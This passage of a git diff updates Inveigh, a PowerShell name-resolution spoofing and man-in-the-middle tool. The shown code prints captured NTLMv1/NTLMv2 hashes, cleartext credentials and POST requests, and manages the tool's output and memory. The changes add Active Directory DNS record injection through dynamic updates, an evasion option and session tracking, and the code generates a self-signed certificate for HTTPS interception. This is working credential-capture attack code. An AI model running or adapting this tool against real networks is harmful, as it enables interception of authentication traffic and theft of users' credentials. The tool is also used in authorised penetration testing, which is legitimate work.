+ Write-Output($inveigh.console_queue[0] + $inveigh.newline)
+ $inveigh.console_queue.RemoveAt(0)
+ }
+ else
+ {
+
+ switch -wildcard ($inveigh.console_queue[0])
+ {
+
+ {$_ -like "?`[`!`]*" -or $_ -like "?`[-`]*"}
+ {
+ Write-Warning $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveAt(0)
+ }
+
+ default
+ {
+ Write-Output $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveAt(0)
+ }
+
+ }
+
+ }
+
+ }
+
+ }
+
+ if($DNS)
+ {
+
+ foreach($DNS in $inveigh.DNS_list)
+ {
+
+ if($DNS.StartsWith("1,"))
+ {
+ Write-Output $DNS.Substring(2)
+ }
+
+ }
+
+ }
+
+ if($DNSFailed)
+ {
+
+ foreach($DNS in $inveigh.DNS_list)
+ {
+
+ if($DNS.StartsWith("0,"))
+ {
+ Write-Output $DNS.Substring(2)
+ }
+
+ }
+
+ }
+
+ if($Log)
+ {
+ Write-Output $inveigh.log
+ }
+
+ if($NTLMv1)
+ {
+ Write-Output $inveigh.NTLMv1_list
+ }
+
+ if($NTLMv1Unique)
+ {
+ $inveigh.NTLMv1_list.Sort()
+
+ foreach($unique_NTLMv1 in $inveigh.NTLMv1_list)
+ {
+ $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2)))
+
+ if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last)
+ {
+ Write-Output $unique_NTLMv1
+ }
+
+ $unique_NTLMv1_account_last = $unique_NTLMv1_account
+ }
+
+ }
+
+ if($NTLMv1Usernames)
+ {
+ Write-Output $inveigh.NTLMv2_username_list
+ }
+
+ if($NTLMv2)
+ {
+ Write-Output $inveigh.NTLMv2_list
+ }
+
+ if($NTLMv2Unique)
+ {
+ $inveigh.NTLMv2_list.Sort()
+
+ foreach($unique_NTLMv2 in $inveigh.NTLMv2_list)
+ {
+ $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2)))
+
+ if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last)
+ {
+ Write-Output $unique_NTLMv2
+ }
+
+ $unique_NTLMv2_account_last = $unique_NTLMv2_account
+ }
+
+ }
+
+ if($NTLMv2Usernames)
+ {
+ Write-Output $inveigh.NTLMv2_username_list
+ }
+
+ if($Cleartext)
+ {
+ Write-Output $inveigh.cleartext_list
+ }
+
+ if($CleartextUnique)
+ {
+ Write-Output $inveigh.cleartext_list | Get-Unique
+ }
+
+ if($POSTRequest)
+ {
+ Write-Output $inveigh.POST_request_list
+ }
+
+ if($POSTRequestUnique)
+ {
+ Write-Output $inveigh.POST_request_list | Get-Unique
+ }
+
+ if($Learning)
+ {
+ Write-Output $inveigh.valid_host_list
+ }
+
+ if($Session)
+ {
+ $i = 0
+
+ while($i -lt $inveigh.session_socket_table.Count)
+ {
+
+ if(!$inveigh.session_socket_table[$i].Connected)
+ {
+ $inveigh.session_list[$i] | Where-Object {$_.Status = "disconnected"}
+ }
+
+ $i++
+ }
+
+ Write-Output $inveigh.session_list | Format-Table -AutoSize
+ }
+
+}
+
+function Watch-Inveigh
+{
+<#
+.SYNOPSIS
+Watch-Inveigh will enabled real time console output. If using this function through a shell, test to ensure that it doesn't hang the shell.
+
+.PARAMETER ConsoleOutput
+(Medium,Low) Medium and Low can be used to reduce output.
+#>
+
+[CmdletBinding()]
+param
+(
+ [parameter(Mandatory=$false)][ValidateSet("Low","Medium")][String]$ConsoleOutput = "Y",
+ [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
+)
+
+if($inveigh.tool -ne 1)
+{
+
+ if($inveigh.running -or $inveigh.relay_running)
+ {
+ Write-Output "[*] Press any key to stop real time console output"
+ $inveigh.console_output = $true
+
+ :console_loop while((($inveigh.running -or $inveigh.relay_running) -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output))
+ {
+
+ while($inveigh.console_queue.Count -gt 0)
+ {
+
+ switch -wildcard ($inveigh.console_queue[0])
+ {
+
+ {$_ -like "?`[`!`]*" -or $_ -like "?`[-`]*"}
+ {
+ Write-Warning $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveAt(0)
+ }
+
+ {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent received *"}
+ {
+
+ if($ConsoleOutput -eq 'Y')
+ {
+ Write-Output $inveigh.console_queue[0]
+ }
+
+ $inveigh.console_queue.RemoveAt(0)
+
+ }
+
+ {$_ -like "* response sent" -or $_ -like "* ignoring *" -or $_ -like "* HTTP*request for *" -or $_ -like "* Proxy request for *"}
+ {
+
+ if($ConsoleOutput -ne "Low")
+ {
+ Write-Output $inveigh.console_queue[0]
+ }
+
+ $inveigh.console_queue.RemoveAt(0)
+
+ }
+
+ default
+ {
+ Write-Output $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveAt(0)
+ }
+
+ }
+
+ }
+
+ if([Console]::KeyAvailable)
+ {
+ $inveigh.console_output = $false
+ BREAK console_loop
+ }
+
+ Start-Sleep -m 5
+ }
+
+ }
+ else
+ {
+ Write-Output "[-] Inveigh isn't running"
+ }
+
+}
+else
+{
+ Write-Output "[-] Watch-Inveigh cannot be used with current external tool selection"
+}
+
+}
+
+function Clear-Inveigh
+{
+<#
+.SYNOPSIS
+Clear-Inveigh will clear Inveigh data from memory.
+#>
+
+if($inveigh)
+{
+
+ if(!$inveigh.running -and !$inveigh.relay_running)
+ {
+ Remove-Variable inveigh -scope global
+ Write-Output "[+] Inveigh data has been cleared from memory"
+ }
+ else
+ {
+ Write-Output "[-] Run Stop-Inveigh before running Clear-Inveigh"
+ }
+
+}
+
+} \ No newline at end of file
diff --git a/Scripts/Inveigh.ps1 b/Inveigh.ps1
index 0510489..0ab78a1 100644
--- a/Scripts/Inveigh.ps1
+++ b/Inveigh.ps1
@@ -2,13 +2,14 @@ function Invoke-Inveigh
{
<#
.SYNOPSIS
-Invoke-Inveigh is a Windows PowerShell LLMNR/mDNS/NBNS spoofer/man-in-the-middle tool with challenge/response
+Invoke-Inveigh is a Windows PowerShell LLMNR/NBNS/mDNS/DNS spoofer/man-in-the-middle tool with challenge/response
capture over HTTP/HTTPS/Proxy/SMB.
.DESCRIPTION
-Invoke-Inveigh is a Windows PowerShell LLMNR/mDNS/NBNS spooferman-in-the-middle tool with the following features:
+Invoke-Inveigh is a Windows PowerShell LLMNR/NBNS/mDNS/DNS spoofer/man-in-the-middle tool with the following features:
IPv4 LLMNR/mDNS/NBNS spoofer with granular control
+ AD DNS injection through secure dynamic updates
NTLMv1/NTLMv2 challenge/response capture over HTTP/HTTPS/Proxy/SMB
Basic auth cleartext credential capture over HTTP/HTTPS/Proxy
WPAD server capable of hosting a basic or custom wpad.dat file
@@ -36,6 +37,17 @@ displaying full capture lists when running through a shell that does not have ac
Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname,
and username combinations when real time console output is enabled.
+.PARAMETER DNS
+Default = Disabled: (Y/N) Enable/Disable injecting DNS host (A) records using dynamic updates.
+
+.PARAMETER DNSThreshold
+Default = 5: The threshold used to determine when DNS records are injected. Inveigh will track identical LLMNR and
+NBNS requests received from multiple systems. DNS records will be injected once the system count for identical LLMNR
+and NBNS requests reaches the threshold.
+
+.PARAMETER DNSTTL
+Default = 3600 Seconds: DNS TTL in seconds for A records.
+
.PARAMETER ElevatedPrivilege
Default = Auto: (Auto/Y/N) Set the privilege mode. Auto will determine if Inveigh is running with
elevated privilege. If so, options that require elevated privilege can be used.
@@ -117,7 +129,7 @@ not want NTLMv1/NTLMv2 captures over SMB. Without elevated privilege, the desire
enabled.
.PARAMETER IP
-Local IP address for listening and packet sniffing. This IP address will also be used for LLMNR/mDNS/NBNS spoofing
+Local IP address for listening and packet sniffing. This IP address will also be used for LLMNR/NBNS/mDNS/DNS spoofing
if the SpooferIP parameter is not set.
.PARAMETER LogOutput
@@ -316,6 +328,7 @@ https://github.com/Kevin-Robertson/Inveigh
[CmdletBinding()]
param
(
+ [parameter(Mandatory=$false)][Array]$DNSHostsIgnore = ("isatap","wpad"),
[parameter(Mandatory=$false)][Array]$HTTPResetDelay = "Firefox",
[parameter(Mandatory=$false)][Array]$ProxyIgnore = "Firefox",
[parameter(Mandatory=$false)][Array]$SpooferHostsReply = "",
@@ -326,6 +339,8 @@ param
[parameter(Mandatory=$false)][Array]$WPADAuthIgnore = "Firefox",
[parameter(Mandatory=$false)][Int]$ConsoleQueueLimit = "-1",
[parameter(Mandatory=$false)][Int]$ConsoleStatus = "",
+ [parameter(Mandatory=$false)][Int]$DNSThreshold = "5",
+ [parameter(Mandatory=$false)][Int]$DNSTTL = "3600",
[parameter(Mandatory=$false)][Int]$HTTPPort = "80",
[parameter(Mandatory=$false)][Int]$HTTPSPort = "443",
[parameter(Mandatory=$false)][Int]$HTTPResetDelayTimeout = "30",
@@ -350,6 +365,8 @@ param
[parameter(Mandatory=$false)][String]$WPADResponse = "",
[parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge = "",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleUnique = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$DNS = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$Evade = "Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput = "N",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileUnique = "Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP = "Y",
@@ -392,11 +409,11 @@ param
if ($invalid_parameter)
{
- Write-Output "Error:$($invalid_parameter) is not a valid parameter"
+ Write-Output "[-] $($invalid_parameter) is not a valid parameter"
throw
}
-$inveigh_version = "1.3.2"
+$inveigh_version = "1.4 Dev"
if(!$IP)
{
@@ -413,7 +430,7 @@ if($HTTPDefaultFile -or $HTTPDefaultEXE)
if(!$HTTPDir)
{
- Write-Output "Error:You must specify an -HTTPDir when using either -HTTPDefaultFile or -HTTPDefaultEXE"
+ Write-Output "[-] You must specify an -HTTPDir when using either -HTTPDefaultFile or -HTTPDefaultEXE"
throw
}
@@ -424,13 +441,13 @@ if($WPADIP -or $WPADPort)
if(!$WPADIP)
{
- Write-Output "Error:You must specify a -WPADPort to go with -WPADIP"
+ Write-Output "[-] You must specify a -WPADPort to go with -WPADIP"
throw
}
if(!$WPADPort)
{
- Write-Output "Error:You must specify a -WPADIP to go with -WPADPort"
+ Write-Output "[-] You must specify a -WPADIP to go with -WPADPort"
throw
}
@@ -438,7 +455,7 @@ if($WPADIP -or $WPADPort)
if($NBNSBruteForce -eq 'Y' -and !$NBNSBruteForceTarget)
{
- Write-Output "Error:You must specify a -NBNSBruteForceTarget if enabling -NBNSBruteForce"
+ Write-Output "[-] You must specify a -NBNSBruteForceTarget if enabling -NBNSBruteForce"
throw
}
@@ -464,11 +481,22 @@ if(!$inveigh)
$inveigh.POST_request_list = New-Object System.Collections.ArrayList
$inveigh.SMBRelay_failed_list = New-Object System.Collections.ArrayList
$inveigh.valid_host_list = New-Object System.Collections.ArrayList
+ $inveigh.requested_host_list = New-Object System.Collections.ArrayList
+ $inveigh.requested_host_IP_list = New-Object System.Collections.ArrayList
+ $inveigh.DNS_list = New-Object System.Collections.ArrayList
+ $inveigh.session_socket_table = [HashTable]::Synchronized(@{})
+ $inveigh.session_table = [HashTable]::Synchronized(@{})
+ $inveigh.session_message_ID_table = [HashTable]::Synchronized(@{})
+ $inveigh.session_user_table = [HashTable]::Synchronized(@{})
+ $inveigh.session_timestamp_table = [HashTable]::Synchronized(@{})
+ $inveigh.session_lock_table = [HashTable]::Synchronized(@{})
+ $inveigh.session_privilege_table = [HashTable]::Synchronized(@{})
+ $inveigh.session_count = 0
}
if($inveigh.running)
{
- Write-Output "Error:Invoke-Inveigh is already running, use Stop-Inveigh"
+ Write-Output "[-] Inveigh is already running"
throw
}
@@ -486,8 +514,8 @@ if(!$inveigh.relay_running)
$inveigh.log_file_queue = New-Object System.Collections.ArrayList
$inveigh.NTLMv1_file_queue = New-Object System.Collections.ArrayList
$inveigh.NTLMv2_file_queue = New-Object System.Collections.ArrayList
+ $inveigh.output_queue = New-Object System.Collections.ArrayList
$inveigh.POST_request_file_queue = New-Object System.Collections.ArrayList
- $inveigh.status_queue = New-Object System.Collections.ArrayList
$inveigh.console_input = $true
$inveigh.console_output = $false
$inveigh.file_output = $false
@@ -556,19 +584,25 @@ if(!$elevated_privilege)
if($HTTPS -eq 'Y')
{
- Write-Output "Error:-HTTPS requires elevated privileges"
+ Write-Output "[-] HTTPS requires elevated privileges"
throw
}
if($SpooferLearning -eq 'Y')
{
- Write-Output "Error:-SpooferLearning requires elevated privileges"
+ Write-Output "[-] SpooferLearning requires elevated privileges"
throw
}
$NBNS = "Y"
$SMB = "N"
+}
+if($DNS -eq 'Y' -and !(Get-Command Invoke-DNSupdate -errorAction SilentlyContinue))
+{
+ Write-Output "[-] DNS requires Invoke-DNSUpdate"
+ throw
+ $DNS = "N"
}
$inveigh.hostname_spoof = $false
@@ -626,7 +660,7 @@ elseif($Tool -eq 2) # PowerShell Empire
$inveigh.tool = 2
$inveigh.output_stream_only = $true
$inveigh.console_input = $false
- $inveigh.newline = "`n" # remove for Empire 2.0
+ $inveigh.newline = ""
$LogOutput = "N"
$ShowHelp = "N"
@@ -658,50 +692,28 @@ else
}
# Write startup messages
-$inveigh.status_queue.Add("Inveigh $inveigh_version started at $(Get-Date -format 's')") > $null
-
-if($FileOutput -eq 'Y')
-{
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh $inveigh_version started") > $null
-}
-if($LogOutput -eq 'Y')
-{
- $inveigh.log.Add("$(Get-Date -format 's') - Inveigh started") > $null
- $inveigh.log_output = $true
-}
-else
-{
- $inveigh.log_output = $false
-}
+$inveigh.output_queue.Add("[*] Inveigh $inveigh_version started at $(Get-Date -format s)") > $null
if($ElevatedPrivilege -eq 'Y' -or $elevated_privilege)
{
- $inveigh.status_queue.Add("Elevated Privilege Mode = Enabled") > $null
+ $inveigh.output_queue.Add("[+] Elevated Privilege Mode = Enabled") > $null
}
else
{
- $inveigh.status_queue.Add("Elevated Privilege Mode = Disabled") > $null
+ $inveigh.output_queue.Add("[!] Elevated Privilege Mode = Disabled") > $null
}
if($firewall_status)
{
- $inveigh.status_queue.Add("Windows Firewall = Enabled") > $null
- $firewall_rules = New-Object -comObject HNetCfg.FwPolicy2
- $firewall_powershell = $firewall_rules.rules | Where-Object {$_.Enabled -eq $true -and $_.Direction -eq 1} |Select-Object -Property Name | Select-String "Windows PowerShell}"
-
- if($firewall_powershell)
- {
- $inveigh.status_queue.Add("Windows Firewall - PowerShell.exe = Allowed") > $null
- }
-
+ $inveigh.output_queue.Add("[!] Windows Firewall = Enabled") > $null
}
-$inveigh.status_queue.Add("Primary IP Address = $IP") > $null
+$inveigh.output_queue.Add("[+] Primary IP Address = $IP") > $null
if($LLMNR -eq 'Y' -or $mDNS -eq 'Y' -or $NBNS -eq 'Y')
{
- $inveigh.status_queue.Add("LLMNR/mDNS/NBNS Spoofer IP Address = $SpooferIP") > $null
+ $inveigh.output_queue.Add("[+] LLMNR/NBNS/mDNS/DNS Spoofer IP Address = $SpooferIP") > $null
}
if($LLMNR -eq 'Y')
@@ -709,21 +721,20 @@ if($LLMNR -eq 'Y')
if($elevated_privilege -or !$LLMNR_port_check)
{
- $inveigh.status_queue.Add("LLMNR Spoofer = Enabled") > $null
- $inveigh.status_queue.Add("LLMNR TTL = $LLMNRTTL Seconds") > $null
- $LLMNR_response_message = "- response sent"
+ $inveigh.output_queue.Add("[+] LLMNR Spoofer = Enabled") > $null
+ $inveigh.output_queue.Add("[+] LLMNR TTL = $LLMNRTTL Seconds") > $null
}
else
{
$LLMNR = "N"
- $inveigh.status_queue.Add("LLMNR Spoofer Disabled Due To In Use Port 5355") > $null
+ $inveigh.output_queue.Add("[-] LLMNR Spoofer Disabled Due To In Use Port 5355") > $null
}
}
else
{
- $inveigh.status_queue.Add("LLMNR Spoofer = Disabled") > $null
- $LLMNR_response_message = "- LLMNR spoofer is disabled"
+ $inveigh.output_queue.Add("[+] LLMNR Spoofer = Disabled") > $null
+ $LLMNR_response_message = "[LLMNR spoofer is disabled]"
}
if($mDNS -eq 'Y')
@@ -735,134 +746,142 @@ if($mDNS -eq 'Y')
if($mDNSTypes.Count -eq 1)
{
- $inveigh.status_queue.Add("mDNS Spoofer For Type $mDNSTypes_output = Enabled") > $null
+ $inveigh.output_queue.Add("[+] mDNS Spoofer For Type $mDNSTypes_output = Enabled") > $null
}
else
{
- $inveigh.status_queue.Add("mDNS Spoofer For Types $mDNSTypes_output = Enabled") > $null
+ $inveigh.output_queue.Add("[+] mDNS Spoofer For Types $mDNSTypes_output = Enabled") > $null
}
- $inveigh.status_queue.Add("mDNS TTL = $mDNSTTL Seconds") > $null
- $mDNS_response_message = "- response sent"
-
+ $inveigh.output_queue.Add("[+] mDNS TTL = $mDNSTTL Seconds") > $null
}
else
{
$mDNS = "N"
- $inveigh.status_queue.Add("mDNS Spoofer Disabled Due To In Use Port 5353") > $null
+ $inveigh.output_queue.Add("[-] mDNS Spoofer Disabled Due To In Use Port 5353") > $null
}
}
else
{
- $inveigh.status_queue.Add("mDNS Spoofer = Disabled") > $null
- $mDNS_response_message = "- mDNS spoofer is disabled"
+ $inveigh.output_queue.Add("[+] mDNS Spoofer = Disabled") > $null
+ $mDNS_response_message = "[mDNS spoofer is disabled]"
}
if($NBNS -eq 'Y')
{
$NBNSTypes_output = $NBNSTypes -join ","
- $NBNS_response_message = "- response sent"
if($NBNSTypes.Count -eq 1)
{
- $inveigh.status_queue.Add("NBNS Spoofer For Type $NBNSTypes_output = Enabled") > $null
+ $inveigh.output_queue.Add("[+] NBNS Spoofer For Type $NBNSTypes_output = Enabled") > $null
}
else
{
- $inveigh.status_queue.Add("NBNS Spoofer For Types $NBNSTypes_output = Enabled") > $null
+ $inveigh.output_queue.Add("[+] NBNS Spoofer For Types $NBNSTypes_output = Enabled") > $null
}
}
else
{
- $inveigh.status_queue.Add("NBNS Spoofer = Disabled") > $null
- $NBNS_response_message = "- NBNS spoofer is disabled"
+ $inveigh.output_queue.Add("[+] NBNS Spoofer = Disabled") > $null
+ $NBNS_response_message = "[NBNS spoofer is disabled]"
}
if($NBNSBruteForce -eq 'Y')
{
- $inveigh.status_queue.Add("NBNS Brute Force Spoofer Target = $NBNSBruteForceTarget") > $null
- $inveigh.status_queue.Add("NBNS Brute Force Spoofer IP Address = $SpooferIP") > $null
- $inveigh.status_queue.Add("NBNS Brute Force Spoofer Hostname = $NBNSBruteForceHost") > $null
+ $inveigh.output_queue.Add("[+] NBNS Brute Force Spoofer Target = $NBNSBruteForceTarget") > $null
+ $inveigh.output_queue.Add("[+] NBNS Brute Force Spoofer IP Address = $SpooferIP") > $null
+ $inveigh.output_queue.Add("[+] NBNS Brute Force Spoofer Hostname = $NBNSBruteForceHost") > $null
if($NBNSBruteForcePause)
{
- $inveigh.status_queue.Add("NBNS Brute Force Pause = $NBNSBruteForcePause Seconds") > $null
+ $inveigh.output_queue.Add("[+] NBNS Brute Force Pause = $NBNSBruteForcePause Seconds") > $null
}
}
if($NBNS -eq 'Y' -or $NBNSBruteForce -eq 'Y')
{
- $inveigh.status_queue.Add("NBNS TTL = $NBNSTTL Seconds") > $null
+ $inveigh.output_queue.Add("[+] NBNS TTL = $NBNSTTL Seconds") > $null
}
if($SpooferLearning -eq 'Y' -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))
{
- $inveigh.status_queue.Add("Spoofer Learning = Enabled") > $null
+ $inveigh.output_queue.Add("[+] Spoofer Learning = Enabled") > $null
if($SpooferLearningDelay -eq 1)
{
- $inveigh.status_queue.Add("Spoofer Learning Delay = $SpooferLearningDelay Minute") > $null
+ $inveigh.output_queue.Add("[+] Spoofer Learning Delay = $SpooferLearningDelay Minute") > $null
}
elseif($SpooferLearningDelay -gt 1)
{
- $inveigh.status_queue.Add("Spoofer Learning Delay = $SpooferLearningDelay Minutes") > $null
+ $inveigh.output_queue.Add("[+] Spoofer Learning Delay = $SpooferLearningDelay Minutes") > $null
}
if($SpooferLearningInterval -eq 1)
{
- $inveigh.status_queue.Add("Spoofer Learning Interval = $SpooferLearningInterval Minute") > $null
+ $inveigh.output_queue.Add("[+] Spoofer Learning Interval = $SpooferLearningInterval Minute") > $null
}
elseif($SpooferLearningInterval -eq 0)
{
- $inveigh.status_queue.Add("Spoofer Learning Interval = Disabled") > $null
+ $inveigh.output_queue.Add("[+] Spoofer Learning Interval = Disabled") > $null
}
elseif($SpooferLearningInterval -gt 1)
{
- $inveigh.status_queue.Add("Spoofer Learning Interval = $SpooferLearningInterval Minutes") > $null
+ $inveigh.output_queue.Add("[+] Spoofer Learning Interval = $SpooferLearningInterval Minutes") > $null
}
}
if($SpooferHostsReply -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))
{
- $inveigh.status_queue.Add("Spoofer Hosts Reply = " + ($SpooferHostsReply -join ",")) > $null
+ $inveigh.output_queue.Add("[+] Spoofer Hosts Reply = " + ($SpooferHostsReply -join ",")) > $null
}
if($SpooferHostsIgnore -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))
{
- $inveigh.status_queue.Add("Spoofer Hosts Ignore = " + ($SpooferHostsIgnore -join ",")) > $null
+ $inveigh.output_queue.Add("[+] Spoofer Hosts Ignore = " + ($SpooferHostsIgnore -join ",")) > $null
}
if($SpooferIPsReply -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))
{
- $inveigh.status_queue.Add("Spoofer IPs Reply = " + ($SpooferIPsReply -join ",")) > $null
+ $inveigh.output_queue.Add("[+] Spoofer IPs Reply = " + ($SpooferIPsReply -join ",")) > $null
}
if($SpooferIPsIgnore -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))
{
- $inveigh.status_queue.Add("Spoofer IPs Ignore = " + ($SpooferIPsIgnore -join ",")) > $null
+ $inveigh.output_queue.Add("[+] Spoofer IPs Ignore = " + ($SpooferIPsIgnore -join ",")) > $null
}
if($SpooferRepeat -eq 'N')
{
$inveigh.spoofer_repeat = $false
- $inveigh.status_queue.Add("Spoofer Repeating = Disabled") > $null
+ $inveigh.output_queue.Add("[+] Spoofer Repeating = Disabled") > $null
}
else
{
$inveigh.spoofer_repeat = $true
}
+if($DNS -eq 'Y')
+{
+ $inveigh.DNS = $true
+ $inveigh.output_queue.Add("[+] DNS Injection = Enabled") > $null
+ $inveigh.output_queue.Add("[+] DNS Hosts Ignore = " + ($DNSHostsIgnore -join ",")) > $null
+}
+else
+{
+ $inveigh.output_queue.Add("[+] DNS Injection = Disabled") > $null
+}
+
if($SMB -eq 'Y' -and $elevated_privilege)
{
- $inveigh.status_queue.Add("SMB Capture = Enabled") > $null
+ $inveigh.output_queue.Add("[+] SMB Capture = Enabled") > $null
}
else
{
- $inveigh.status_queue.Add("SMB Capture = Disabled") > $null
+ $inveigh.output_queue.Add("[+] SMB Capture = Disabled") > $null
}
if($HTTP -eq 'Y')
@@ -871,28 +890,28 @@ if($HTTP -eq 'Y')
if($HTTP_port_check)
{
$HTTP = "N"
- $inveigh.status_queue.Add("HTTP Capture Disabled Due To In Use Port $HTTPPort") > $null
+ $inveigh.output_queue.Add("[-] HTTP Capture Disabled Due To In Use Port $HTTPPort") > $null
}
else
{
if($HTTPIP -ne '0.0.0.0')
{
- $inveigh.status_queue.Add("HTTP IP = $HTTPIP") > $null
+ $inveigh.output_queue.Add("[+] HTTP IP = $HTTPIP") > $null
}
if($HTTPPort -ne 80)
{
- $inveigh.status_queue.Add("HTTP Port = $HTTPPort") > $null
+ $inveigh.output_queue.Add("[+] HTTP Port = $HTTPPort") > $null
}
- $inveigh.status_queue.Add("HTTP Capture = Enabled") > $null
+ $inveigh.output_queue.Add("[+] HTTP Capture = Enabled") > $null
}
}
else
{
- $inveigh.status_queue.Add("HTTP Capture = Disabled") > $null
+ $inveigh.output_queue.Add("[+] HTTP Capture = Disabled") > $null
}
if($HTTPS -eq 'Y')
@@ -902,7 +921,7 @@ if($HTTPS -eq 'Y')
{
$HTTPS = "N"
$inveigh.HTTPS = $false
- $inveigh.status_queue.Add("HTTPS Capture Disabled Due To In Use Port $HTTPSPort") > $null
+ $inveigh.output_queue.Add("[-] HTTPS Capture Disabled Due To In Use Port $HTTPSPort") > $null
}
else
{
@@ -911,13 +930,13 @@ if($HTTPS -eq 'Y')
{
$inveigh.certificate_issuer = $HTTPSCertIssuer
$inveigh.certificate_CN = $HTTPSCertSubject
- $inveigh.status_queue.Add("HTTPS Certificate Issuer = " + $inveigh.certificate_issuer) > $null
- $inveigh.status_queue.Add("HTTPS Certificate CN = " + $inveigh.certificate_CN) > $null
+ $inveigh.output_queue.Add("HTTPS Certificate Issuer = " + $inveigh.certificate_issuer) > $null
+ $inveigh.output_queue.Add("HTTPS Certificate CN = " + $inveigh.certificate_CN) > $null
$certificate_check = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -Like "CN=" + $inveigh.certificate_issuer})
if(!$certificate_check)
{
- # credit to subTee for cert creation code https://github.com/subTee/Interceptor
+ # credit to subTee for cert creation code from Interceptor
$certificate_distinguished_name = new-object -com "X509Enrollment.CX500DistinguishedName"
$certificate_distinguished_name.Encode( "CN=" + $inveigh.certificate_CN, $certificate_distinguished_name.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE)
$certificate_issuer_distinguished_name = new-object -com "X509Enrollment.CX500DistinguishedName"
@@ -931,7 +950,7 @@ if($HTTPS -eq 'Y')
$certificate_server_auth_OID = new-object -com "X509Enrollment.CObjectId"
$certificate_server_auth_OID.InitializeFromValue("1.3.6.1.5.5.7.3.1")
$certificate_enhanced_key_usage_OID = new-object -com "X509Enrollment.CObjectIds.1"
- $certificate_enhanced_key_usage_OID.add($certificate_server_auth_OID)
+ $certificate_enhanced_key_usage_OID.Add($certificate_server_auth_OID)
$certificate_enhanced_key_usage_extension = new-object -com "X509Enrollment.CX509ExtensionEnhancedKeyUsage"
$certificate_enhanced_key_usage_extension.InitializeEncode($certificate_enhanced_key_usage_OID)
$certificate = new-object -com "X509Enrollment.CX509CertificateRequestCertificate"
@@ -963,29 +982,29 @@ if($HTTPS -eq 'Y')
}
$inveigh.HTTPS_existing_certificate = $true
- $inveigh.status_queue.Add("HTTPS Capture = Using Existing Certificate") > $null
+ $inveigh.output_queue.Add("[+] HTTPS Capture = Using Existing Certificate") > $null
}
$inveigh.HTTPS = $true
if($HTTPIP -ne '0.0.0.0')
{
- $inveigh.status_queue.Add("HTTPS IP = $HTTPIP") > $null
+ $inveigh.output_queue.Add("[+] HTTPS IP = $HTTPIP") > $null
}
if($HTTPSPort -ne 443)
{
- $inveigh.status_queue.Add("HTTPS Port = $HTTPSPort") > $null
+ $inveigh.output_queue.Add("[+] HTTPS Port = $HTTPSPort") > $null
}
- $inveigh.status_queue.Add("HTTPS Capture = Enabled") > $null
+ $inveigh.output_queue.Add("[+] HTTPS Capture = Enabled") > $null
}
catch
{
$HTTPS = "N"
$inveigh.HTTPS = $false
- $inveigh.status_queue.Add("HTTPS Capture Disabled Due To Certificate Error") > $null
+ $inveigh.output_queue.Add("[-] HTTPS Capture Disabled Due To Certificate Error") > $null
}
}
@@ -993,13 +1012,13 @@ if($HTTPS -eq 'Y')
}
else
{
- $inveigh.status_queue.Add("HTTPS Capture = Disabled") > $null
+ $inveigh.output_queue.Add("[+] HTTPS Capture = Disabled") > $null
}
if($HTTP -eq 'Y' -or $HTTPS -eq 'Y')
{
- $inveigh.status_queue.Add("HTTP/HTTPS Authentication = $HTTPAuth") > $null
- $inveigh.status_queue.Add("WPAD Authentication = $WPADAuth") > $null
+ $inveigh.output_queue.Add("[+] HTTP/HTTPS Authentication = $HTTPAuth") > $null
+ $inveigh.output_queue.Add("[+] WPAD Authentication = $WPADAuth") > $null
if($WPADAuth -like "NTLM*")
{
@@ -1007,48 +1026,48 @@ if($HTTP -eq 'Y' -or $HTTPS -eq 'Y')
if($WPADAuthIgnore.Count -gt 0)
{
- $inveigh.status_queue.Add("WPAD NTLM Authentication Ignore List = " + ($WPADAuthIgnore -join ",")) > $null
+ $inveigh.output_queue.Add("[+] WPAD NTLM Authentication Ignore List = " + ($WPADAuthIgnore -join ",")) > $null
}
}
if($HTTPDir -and !$HTTPResponse)
{
- $inveigh.status_queue.Add("HTTP/HTTPS Directory = $HTTPDir") > $null
+ $inveigh.output_queue.Add("[+] HTTP/HTTPS Directory = $HTTPDir") > $null
if($HTTPDefaultFile)
{
- $inveigh.status_queue.Add("HTTP/HTTPS Default Response File = $HTTPDefaultFile") > $null
+ $inveigh.output_queue.Add("[+] HTTP/HTTPS Default Response File = $HTTPDefaultFile") > $null
}
if($HTTPDefaultEXE)
{
- $inveigh.status_queue.Add("HTTP/HTTPS Default Response Executable = $HTTPDefaultEXE") > $null
+ $inveigh.output_queue.Add("[+] HTTP/HTTPS Default Response Executable = $HTTPDefaultEXE") > $null
}
}
if($HTTPResponse)
{
- $inveigh.status_queue.Add("HTTP/HTTPS Response = Enabled") > $null
+ $inveigh.output_queue.Add("[+] HTTP/HTTPS Response = Enabled") > $null
}
if($HTTPResponse -or $HTTPDir -and $HTTPContentType -ne 'html/text')
{
- $inveigh.status_queue.Add("HTTP/HTTPS/Proxy Content Type = $HTTPContentType") > $null
